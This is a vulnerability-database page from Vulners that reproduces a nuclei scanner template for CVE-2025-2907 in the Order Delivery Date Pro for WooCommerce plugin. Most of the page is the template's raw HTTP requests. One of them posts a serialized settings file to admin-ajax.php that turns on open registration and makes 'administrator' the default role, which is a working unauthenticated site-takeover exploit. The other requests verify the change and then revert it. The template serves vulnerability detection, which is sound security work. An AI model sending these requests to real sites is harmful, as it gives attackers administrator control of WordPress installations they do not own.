Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Order Delivery Date Pro for WooCommerce < 12.3.1 - Arbitrary Option Update

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 65 Views

Critical vulnerability in Order Delivery Date Pro < 12.3.1 allows unauthorized admin access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Cross-Site Request Forgery (CSRF) in Tychesoftwares Order_Delivery_Date_Pro_For_Woocommerce
26 May 202503:02
githubexploit
Circl		CVE-2025-2907
26 Apr 202506:08
circl
CNNVD		WordPress plugin Order Delivery Date 安全漏洞
26 Apr 202500:00
cnnvd
CVE		CVE-2025-2907
26 Apr 202506:00
cve
Cvelist		CVE-2025-2907 Order Delivery Date Pro for WooCommerce < 12.3.1 - Unauthenticated Arbitrary Option Update
26 Apr 202506:00
cvelist
EUVD		EUVD-2025-12492
3 Oct 202520:07
euvd
NVD		CVE-2025-2907
26 Apr 202506:15
nvd
OSV		CVE-2025-2907
26 Apr 202506:15
osv
Packet Storm News		WordPress Order Delivery Date Missing Authorization
27 May 202500:00
packetstormnews
Patchstack		WordPress Order Delivery Date Pro for WooCommerce plugin < 12.3.1 - Unauthenticated Arbitrary Option Update vulnerability
28 Apr 202507:18
patchstack
Rows per page
id: CVE-2025-2907

info:
  name: Order Delivery Date Pro for WooCommerce < 12.3.1 - Arbitrary Option Update
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Order Delivery Date WordPress plugin before 12.3.1 does not have authorization and CSRF checks when importing settings. Furthermore it also lacks proper checks to only update options relevant to the Order Delivery Date WordPress plugin before 12.3.1. This leads to attackers being able to modify the default_user_role to administrator and users_can_register, allowing them to register as an administrator of the site for complete site takeover.
  impact: |
    Unauthenticated attackers can modify WordPress options to enable user registration with administrator role, allowing complete site takeover without authentication.
  remediation: |
    Update to version 12.3.1 or later.
  reference:
    - https://wpscan.com/vulnerability/2e513930-ec01-4dc6-8991-645c5267e14c/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2907
  classification:
    epss-score: 0.01286
    epss-percentile: 0.66546
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2907
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 4
    fofa-query: body="wp-content/plugins/order-delivery-date-for-woocommerce"
  tags: cve,cve2025,wp,wordpress,wp-plugin,takeover,order-delivery-date,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYq6CV9CqPQBC7dSy

        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy
        Content-Disposition: form-data; name="action"

        orddd_import
        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy
        Content-Disposition: form-data; name="is_drag_drop_request_ajax"

        yes
        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy
        Content-Disposition: form-data; name="orddd-import-file";filename="exp.json"

        a:2:{s:18:"users_can_register";b:1;s:12:"default_role";s:13:"administrator";}
        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy--

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'orddd_import_success')"
          - "contains(header, 'application/json')"
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'wp-login-register')"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYq6CV9CqPQBC7dSy

        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy
        Content-Disposition: form-data; name="action"

        orddd_import
        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy
        Content-Disposition: form-data; name="is_drag_drop_request_ajax"

        yes
        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy
        Content-Disposition: form-data; name="orddd-import-file";filename="exp.json"

        a:2:{s:18:"users_can_register";b:0;s:12:"default_role";s:13:"administrator";}
        ------WebKitFormBoundaryYq6CV9CqPQBC7dSy--

      - |
        GET /wp-login.php?{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "wp-login-register"
        negative: true
# digest: 4a0a00473045022062a4d968df8e4030124a67465e48bf27eab53a30a0213acae053ee18750798de022100efa9ae37946a9d15cd45bf3182fccb23b95df5c17bd4c24b80e5965e0bd5f89f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.19.8
EPSS0.01286
SSVC
cvecve2025wordpresswp-plugintakeoveradministrationsecurity-vulnerability
65